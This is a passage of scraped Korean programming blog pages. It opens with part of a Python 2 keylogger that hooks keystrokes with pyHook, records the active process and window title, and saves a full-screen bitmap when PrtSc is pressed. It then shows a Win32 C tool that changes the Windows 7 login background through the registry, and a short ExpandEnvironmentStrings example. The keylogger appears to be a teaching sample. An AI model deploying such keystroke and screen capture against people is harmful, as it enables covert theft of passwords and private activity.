    height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
    left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
    top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

    desktop_dc = win32gui.GetWindowDC(hdesktop)
    img_dc = win32ui.CreateDCFromHandle(desktop_dc)

    mem_dc = img_dc.CreateCompatibleDC()

    screenshot = win32ui.CreateBitmap()
    screenshot.CreateCompatibleBitmap(img_dc, width, height)
    mem_dc.SelectObject(screenshot)

    mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

    # 위에서 만든 비트맵을 여기서 파일로 저장해줌
    screenshot.SaveBitmapFile(mem_dc, 'C:\\Users\\HWAN\\Desktop\\test.bmp')

    mem_dc.DeleteDC()
    win32gui.DeleteObject(screenshot.GetHandle())


def get_current_process(): # 현재 활성화된 프로세스 정보를 얻어옴
    hwnd = user32.GetForegroundWindow()

    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))

    process_id = "%d" % pid.value

    executable = create_string_buffer("\x00" *512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)

    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)

    print
    print "[PID : %s - %s - %s]" % (process_id, executable.value, window_title.value)
    print

    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)


def KeyStroke(event): # 키다운 발생되었을 때 처리
    try:
        global current_window

        if event.WindowName != current_window:
            current_window = event.WindowName
            get_current_process()

        if event.Ascii > 32 and event.Ascii < 127:
            print chr(event.Ascii),
        else:
            if event.Key == "Snapshot": # PrtSc 키 입력시 screenshot() 호출
                screenshot()   
            else:
                print "[%s]" % event.Key,
    except:
        None
    return True


#훅 매니저 등록
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke

kl.HookKeyboard()
pythoncom.PumpMessages()

 

 

728x90
반응형

'프로그래밍 > Python' 카테고리의 다른 글

[Python] FinanceDataReader 모듈  (0) 2021.07.31
[Python] pykrx 모듈  (0) 2021.05.27
[Python] yfinance 모듈  (0) 2021.05.27
[Python] pycryptodome 모듈  (0) 2020.09.26
[Python] 원 나누기  (0) 2016.10.03
[Python] 돌림판  (0) 2016.10.03
728x90
반응형

[방법]

 1. 레지스트리 수정

   경로 : HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Authentication\\LogonUI\\Background

   수정 : OEMBackground -> 1 (없으면 생성 REG_DWORD)

 2. 이미지 파일 설치

   경로 : c:\windows\system32\oobe\info\backgrounds (없는 디렉토리는 만들면 됨)

   파일 : backgroundDefault.jpg (이름 같아야됨, 256KB 보다 작은 이미지 파일 사용 - 크면 적용 안됨)


[기본 화면]


[변경 후 화면]


728x90
반응형

'기타' 카테고리의 다른 글

[tip] ffmpeg 파일 변환  (0) 2018.01.16
[tip] OneDrive 완전삭제  (0) 2017.10.16
[tip] Putty 설정 파일  (0) 2017.10.07
[tip] windows7 로그인 화면 캡쳐  (0) 2016.09.18
[MIPS] Hello World  (0) 2015.10.03
[MIPS] PCSpim  (0) 2015.10.03
728x90
반응형

[기본 지식]

 - 로그인 배경화면 변경 방법

 - 관리자 권한 요구

 - 파일열기 대화상자

 - 레지스트리 변경 방법

 

[Example Source]

#include <windows.h>
#include <stdio.h>
#include "ShReg.h" // Windows API정복 책 참조

#define KEY L"SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Authentication\\LogonUI\\Background" 
#define PATH L"C:\\windows\\system32\\oobe\\info\\backgrounds\\backgroundDefault.jpg"
#define DIRPATH L"C:\\windows\\system32\\oobe\\info\\backgrounds"

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
HINSTANCE g_Inst;
LPCWSTR lpszClass = TEXT("Window");

// http://blog.naver.com/PostView.nhn?blogId=dolicom&logNo=10096040743 참조
void CreateDir(WCHAR* Path)
{
    WCHAR DirName[256];  //생성할 디렉초리 이름
    WCHAR* p = Path;     //인자로 받은 디렉토리
    WCHAR* q = DirName;  

    while(*p)
    {
        if (('\\' == *p) || ('/' == *p))   //루트디렉토리 혹은 Sub디렉토리
        {
            if (':' != *(p-1))
            {
                CreateDirectory(DirName, NULL);
            }
        }
        *q++ = *p++;
        *q = '\0';
    }
    CreateDirectory(DirName, NULL);  
}

// WinMain 생략

LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM lParam)
{
    static HANDLE hFile;
    HANDLE hFile_new;
    DWORD numWritten;
    static DWORD nFileSize;
    OPENFILENAME OFN;
    TCHAR lpstrFile[MAX_PATH] = L"";

    static HDC hdc;
    PAINTSTRUCT ps;
    static BOOL file_state;
    static WCHAR str[100];

    static char *buf;
    DWORD readn; 

    switch(iMessage)
    {
    case WM_CREATE:
        CreateWindow(L"button", L"Image Select", WS_CHILD|WS_VISIBLE|BS_PUSHBUTTON, 10, 10, 150, 25, hWnd, (HMENU)1, g_Inst, NULL);
        CreateWindow(L"button", L"convert Background", WS_CHILD|WS_VISIBLE|BS_PUSHBUTTON, 10, 40, 150, 25, hWnd, (HMENU)2, g_Inst, NULL);
        file_state = FALSE;
        CreateDir(DIRPATH); // DIRPATH 경로에 디렉토리가 없다면 생성 (부모 디렉토리가 없어도 알아서 생성)
        break;

    case WM_COMMAND:
        switch(LOWORD(wParam))
        {
        case 1:
            memset(&OFN, 0, sizeof(OPENFILENAME));
            OFN.lStructSize = sizeof(OPENFILENAME);
            OFN.hwndOwner=hWnd;
            OFN.lpstrFilter=TEXT("jpg\0*.jpg\0");
            OFN.lpstrFile=lpstrFile;
            OFN.nMaxFile=MAX_PATH;

            if(GetOpenFileName(&OFN) != 0)
            {
                if( (hFile = CreateFile(OFN.lpstrFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE)
                {
                    
                    if((nFileSize = GetFileSize(hFile, NULL)) >= 256000) // 파일 사이즈 검사
                    {
                        MessageBox(hWnd, L"File size is too big \"Below 256kb\"", L"Error", MB_OK);
                        DestroyWindow(hWnd);
                    }

                    buf = (char*) malloc (nFileSize); // 파일 사이즈 만큼 할당
                    ReadFile(hFile, buf, nFileSize, &readn, NULL); // 파일 사이즈 만큼 읽어옴
                    
                    file_state = TRUE;
                    
                    swprintf_s(str, 100, L"%s", OFN.lpstrFile);
                    InvalidateRect(hWnd, NULL, TRUE);
                }
            }
            break;
        case 2:
            if(file_state != FALSE) // 파일이 열려있는지 확인
            {
                // 파일을 쓰기위해 핸들을 얻어옴 (PATH에 해당하는 파일이 없다면 생성)
                if( (hFile_new = CreateFile(PATH, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL)) != INVALID_HANDLE_VALUE)
                {
                    // PATH에 아까 열었던 이미지파일을 써줌
                    if( WriteFile(hFile_new, buf, nFileSize, &numWritten, NULL) != 0)
                        MessageBox(hWnd, L"File Write Success", 0, MB_OK);
                    else
                        MessageBox(hWnd, L"File Write Failed", 0, MB_OK);
                
                    free(buf);
                    DestroyWindow(hWnd);
                }
                SHRegWriteInt(SHLM, KEY, L"OEMBackground", 1); 
 // 레지스트리 경로 내부의 OEMBackground를 1로 변경 (PATH를 배경으로 사용하겠다는 의미)
            }
            else
            {
                MessageBox(0, L"File open Failed", 0, 0);
            }
        } 
        break;

    case WM_PAINT:
        hdc = BeginPaint(hWnd , &ps);
        
        TextOut(hdc, 170, 10, str, WideCharToMultiByte( CP_ACP, 0, str, -1, NULL, 0, NULL, NULL )-1); 
 // 유니코드 문자열의 사이즈를 구하기 위해 WideCharToMultiByte() 사용

        EndPaint(hWnd, NULL);
        break;

    case WM_DESTROY:
        PostQuitMessage(0);
        return 0;
    }
    return DefWindowProc(hWnd, iMessage, wParam,lParam);
}

 

 

728x90
반응형
728x90
반응형

1. 개요

 ExpandEnvironmentStrings(LPCTSTR lpSrc, LPTSTR lpDst, DWORD nSize)

 - 환경 변수에 저장된 데이터를 불러올 수 있음.

 

 Parameter

 - lpSrc : 아래 표의 왼쪽 값을 문자열로 넣어줌.

 - lpDst : 아래 표 오른쪽 결과를 얻어옴.

 - nSize : lpDst 의 크기

출처 : http://securityfactory.tistory.com/315

2. 코드

#include<windows.h>
#include<stdio.h>

#define SYSTEMDRIVE  "%SystemDrive%"
#define PUBLIC       "%PUBLIC%"
#define USERDOMAIN   "%USERDOMAIN%"
#define USERNAME     "%USERNAME%"
#define OS           "%OS%"
#define COMPUTERNAME "%COMPUTERNAME%"

int main()
{
    LPTSTR lpDst[200];

    ExpandEnvironmentStrings(SYSTEMDRIVE, lpDst, sizeof(lpDst));
    printf("Result : %s\n", lpDst);
    
    return 0;
}

 

728x90
반응형

+ Recent posts